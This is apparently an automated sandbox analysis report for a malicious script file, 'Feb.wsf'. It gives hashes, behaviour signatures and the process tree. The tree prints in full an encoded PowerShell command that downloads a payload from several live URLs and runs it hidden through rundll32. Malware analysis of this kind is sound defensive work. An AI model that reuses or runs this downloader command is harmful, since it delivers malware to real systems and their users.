Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Resubmissions
01/08/2023, 11:40
230801-nsw4nagf4y 821/04/2023, 15:45
230421-s7bhqage68 821/04/2023, 15:10
230421-skcr9sgc43 8Analysis
-
max time kernel
124s -
max time network
132s -
platform
windows10-1703_x64 -
resource
win10-20230703-en -
resource tags
arch:x64arch:x86image:win10-20230703-enlocale:en-usos:windows10-1703-x64system -
submitted
01/08/2023, 11:40
Static task
static1
Behavioral task
behavioral1
Sample
file/Feb.wsf
Resource
win10-20230703-en
General
-
Target
file/Feb.wsf
-
Size
290KB
-
MD5
20e65f83fcbe1f10fb6cf6a29ab55a65
-
SHA1
a79c622dc5787025ce5c01ae9415c2df413d801a
-
SHA256
b396786fcbae38eb8d4d481bf05c42cdf8ef34cd2b0a81eb38b2c7c10b7ce3b6
-
SHA512
9d855840c0ee3d3625844dfe9890baff82248cc0296405a11b88add330763e8410d475467c2d0f79f559dde547e700674a6f2ca75bb70bfac3ca4ebbe128d9ad
-
SSDEEP
6144:vaG7zwUsHDxO3yHfgrogRcarC6Mq7VFyr0idubJTxPbdj9:Sdd/n0NDdx
Malware Config
Signatures
-
Blocklisted process makes network request 9 IoCs
flow pid Process 4 1772 powershell.exe 7 1772 powershell.exe 11 1772 powershell.exe 14 1772 powershell.exe 16 1772 powershell.exe 19 1772 powershell.exe 23 1772 powershell.exe 26 1772 powershell.exe 28 1772 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 1772 powershell.exe 1772 powershell.exe 1772 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1772 powershell.exe -
Suspicious use of WriteProcessMemory 2 IoCs
description pid Process procid_target PID 5088 wrote to memory of 1772 5088 WScript.exe 70 PID 5088 wrote to memory of 1772 5088 WScript.exe 70
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\file\Feb.wsf"1⤵
- Suspicious use of WriteProcessMemory
PID:5088 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQA7ACQAYQBkAGEAbQBpAGMAYQBsAGwAeQBVAG4AdABlAHMAdABpAGYAeQBpAG4AZwAgAD0AIAAoACIAaAB0AHQAcABzADoALwAvAGMAYQByAGwAYQBkAHYAbwBnAGEAZABhAHQAcgBpAGIAdQB0AGEAcgBpAGEALgBjAG8AbQAvAHQAdgBuAHEAOQAvAEYAUAA0AGkAcQBEAEIAawBSADgAMQAsAGgAdAB0AHAAcwA6AC8ALwBnAHMAcwBjAG8AcgBwAG8AcgBhAHQAaQBvAG4AbAB0AGQALgBjAG8AbQAvAG8AawBTAGYAagAvAHMAVwB3ADcAVQA3AFcATwAsAGgAdAB0AHAAcwA6AC8ALwBtAHIAYwByAGkAegBxAHUAbgBhAC4AYwBvAG0ALwBMADcAYwBjAE4ALwBHAEgAdwAzADEAYQAsAGgAdAB0AHAAcwA6AC8ALwBjAGkAdAB5AHQAZQBjAGgALQBzAG8AbAB1AHQAaQBvAG4AcwAuAGMAbwBtAC8ANgBNAGgAMQBrAC8AOQBEAEYAMABBAFEARwBoAFoAcABqAGMALABoAHQAdABwAHMAOgAvAC8AZQByAGcALQBlAGcALgBjAG8AbQAvAG8AYwBtAGIALwBVAEcAegAxAEcAaAB3AFQALABoAHQAdABwAHMAOgAvAC8AegBhAGkAbgBjAG8ALgBuAGUAdAAvAE8AZABPAFUALwBPADMAQQBrAGIAUwBnACwAaAB0AHQAcABzADoALwAvAGgAbwB0AGUAbABsAG8AcwBtAGkAcgB0AG8AcwAuAGMAbwBtAC8AcwBqAG4ALwB3AFUAVwBFAG8AMQBiADEASQB1AFkALABoAHQAdABwAHMAOgAvAC8AbgBhAHkAYQBkAG8AZgBvAHUAbgBkAGEAdABpAG8AbgAuAG8AcgBnAC8AdwBYAGEASwBtAC8AZABWAFoANQBRAGwAIgApAC4AcwBwAGwAaQB0ACgAIgAsACIAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAaQBzAG0AYQBlAGwAaQB0AGUARABlAGYAbwByAGUAcwB0AHMAIABpAG4AIAAkAGEAZABhAG0AaQBjAGEAbABsAHkAVQBuAHQAZQBzAHQAaQBmAHkAaQBuAGcAKQAgAHsAdAByAHkAIAB7AHcAZwBlAHQAIAAkAGkAcwBtAGEAZQBsAGkAdABlAEQAZQBmAG8AcgBlAHMAdABzACAALQBUAGkAbQBlAG8AdQB0AFMAZQBjACAAMQA2ACAALQBPACAAJABlAG4AdgA6AFQARQBNAFAAXABDAHUAcgBhAHIAZQAuAGQAbwBwAGkAZQByADsAaQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgACQAZQBuAHYAOgBUAEUATQBQAFwAQwB1AHIAYQByAGUALgBkAG8AcABpAGUAcgApAC4AbABlAG4AZwB0AGgAIAAtAGcAZQAgADEAMAAwADAAMAAwACkAIAB7AHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAEgAaQBkAGQAZQBuACAALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAEIAeQBwAGEAcwBzACAALQBOAG8ATABvAGcAbwAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAGUAbgBjAG8AZABlAGQAYwBvAG0AbQBhAG4AZAAgACIAYwB3AEIAMABBAEcARQBBAGMAZwBCADAAQQBDAEEAQQBjAGcAQgAxAEEARwA0AEEAWgBBAEIAcwBBAEcAdwBBAE0AdwBBAHkAQQBDAEEAQQBKAEEAQgBsAEEARwA0AEEAZABnAEEANgBBAEYAUQBBAFIAUQBCAE4AQQBGAEEAQQBYAEEAQgBEAEEASABVAEEAYwBnAEIAaABBAEgASQBBAFoAUQBBAHUAQQBHAFEAQQBiAHcAQgB3AEEARwBrAEEAWgBRAEIAeQBBAEMAdwBBAFQAUQBCAHYAQQBIAFEAQQBaAEEAQQA3AEEAQQA9AD0AIgA7AGIAcgBlAGEAawA7AH0AfQBjAGEAdABjAGgAIAB7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADUAOwB9AH0A"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1772
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe"1⤵PID:872
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:424
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a